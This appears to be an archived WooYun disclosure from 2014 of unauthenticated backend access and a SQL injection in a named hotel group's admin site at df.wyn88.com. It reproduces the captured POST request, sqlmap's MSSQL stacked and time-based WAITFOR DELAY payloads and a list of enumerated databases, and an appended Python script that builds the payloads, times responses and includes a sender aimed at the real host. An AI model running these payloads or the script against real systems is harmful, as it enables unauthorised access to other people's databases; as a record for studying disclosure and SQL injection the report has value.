WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-10-29: Details reported to the vendor, awaiting vendor response.
2014-11-03: Vendor actively ignored the vulnerability; details disclosed to the public.
~~ Looking for an invite code
Admin backend address: http://df.wyn88.com:8087/
1. Unauthorized access: the backend can be tested directly without logging in.
2. SQL injection in the points lookup (SearchCent) feature.
POST request captured with Burp:
POST /home/SearchCent HTTP/1.1
Host: df.wyn88.com:8087
Proxy-Connection: keep-alive
Content-Length: 32
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://df.wyn88.com:8087
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://df.wyn88.com:8087/home/SearchCent
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: LXB_REFER=www.google.com; Hm_lvt_ae8bddcb177c34849249800dc684ac2c=1414414368,1414414373; Hm_lpvt_ae8bddcb177c34849249800dc684ac2c=1414414854
RA-Ver: 2.7.0
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc

ass_cardno=015684&page=1&rows=50
sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: ass_cardno
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ass_cardno=015684; WAITFOR DELAY '0:0:5'--&page=1&rows=50

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ass_cardno=015684 WAITFOR DELAY '0:0:5'--&page=1&rows=50
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current database: 'ftdata'
available databases [52]:
[*] [OperationData]
[*] [WynCmsDB!]
[*] CenterCRM
[*] ConvertToPMSThd
[*] CRM_MPS_duibi
[*] DBStorage
[*] DW_VIENNA
[*] ftdata
[*] jira
[*] master
[*] Member
[*] model
[*] msdb
[*] PmsBase
[*] PmsBase_20140915
[*] PmsBase_Open
[*] PmsBase_Train
[*] PmsBusiness
[*] PmsBusiness_20140915
[*] PmsBusiness_C
[*] PmsBusiness_History
[*] PmsBusiness_Open
[*] PmsBusine
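As an added example (not part of the original report or of sqlmap), the timing check behind the two findings above, in Python: it builds the stacked-query and inline WAITFOR DELAY probes for ass_cardno exactly as sqlmap reported them, compares their response times against a baseline request, and runs against a constructed stand-in for the endpoint so nothing is sent to the host. Only the URL, parameter names and payloads come from the report; the simulated servers, their 0.2 s latency and the hypothetical http_sender helper are assumptions.

```python
import re
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict

# Endpoint, parameter names and probe shapes are taken from the report above.
TARGET = "http://df.wyn88.com:8087/home/SearchCent"
PARAM = "ass_cardno"
BASE_VALUE = "015684"
EXTRA = {"page": "1", "rows": "50"}

# A sender takes a form-encoded body and returns the response time in seconds.
Sender = Callable[[str], float]


def build_payloads(value: str, delay: int) -> Dict[str, str]:
    """The two MSSQL probes sqlmap reported: stacked query and inline WAITFOR."""
    wait = f"WAITFOR DELAY '0:0:{delay}'--"
    return {
        "stacked": f"{value}; {wait}",
        "inline": f"{value} {wait}",
    }


def encode_body(param_value: str) -> str:
    """Form-encode ass_cardno plus the fixed page/rows fields of the request."""
    return urllib.parse.urlencode({PARAM: param_value, **EXTRA})


def confirm_time_based(send: Sender, delay: int = 5, samples: int = 2,
                       tolerance: float = 1.0) -> Dict[str, bool]:
    """Per probe type, True only if every sample took at least `delay` seconds
    (minus tolerance) longer than the slowest baseline response. Repeating the
    probe and using the slowest baseline keeps one slow response from counting
    as a positive."""
    baseline = max(send(encode_body(BASE_VALUE)) for _ in range(samples))
    verdict = {}
    for kind, payload in build_payloads(BASE_VALUE, delay).items():
        body = encode_body(payload)
        timings = [send(body) for _ in range(samples)]
        verdict[kind] = all(t >= baseline + delay - tolerance for t in timings)
    return verdict


def http_sender(url: str = TARGET) -> Sender:
    """Hypothetical live sender (assumption; not used by the offline run below):
    posts the body the way the captured request did and times the round trip."""
    def send(body: str) -> float:
        req = urllib.request.Request(
            url, data=body.encode(), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded",
                     "X-Requested-With": "XMLHttpRequest"})
        start = time.monotonic()
        with urllib.request.urlopen(req, timeout=30) as resp:
            resp.read()
        return time.monotonic() - start
    return send


SIM_LATENCY = 0.2  # constructed: normal response time of the stand-in servers


def vulnerable_server(body: str) -> float:
    """Constructed stand-in for the endpoint: ass_cardno is concatenated into the
    SQL text, so a WAITFOR DELAY inside the value is executed by the database."""
    value = urllib.parse.parse_qs(body).get(PARAM, [""])[0]
    m = re.search(r"WAITFOR DELAY '0:0:(\d+)'", value, re.IGNORECASE)
    return SIM_LATENCY + (int(m.group(1)) if m else 0)


def patched_server(body: str) -> float:
    """Stand-in for a parameterised query: the value is bound, never executed."""
    return SIM_LATENCY


if __name__ == "__main__":
    print("vulnerable:", confirm_time_based(vulnerable_server))
    print("patched:   ", confirm_time_based(patched_server))
```

Running the script compares the two stand-ins: the concatenating server reports both probe types as positive, the parameterised one as negative. Against the real host you would pass http_sender() instead of a stand-in; keep `samples` at two or more, since a 5 s delay is easy to mistake for network jitter on a single request.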
Tables in the Member database:
I won't list the rest; there are quite a lot of tables.
Looking for an invite code
Severity: No impact (vendor ignored)
Ignored at: 2014-11-03 15:50
2015-01-26: Test system, already shut down.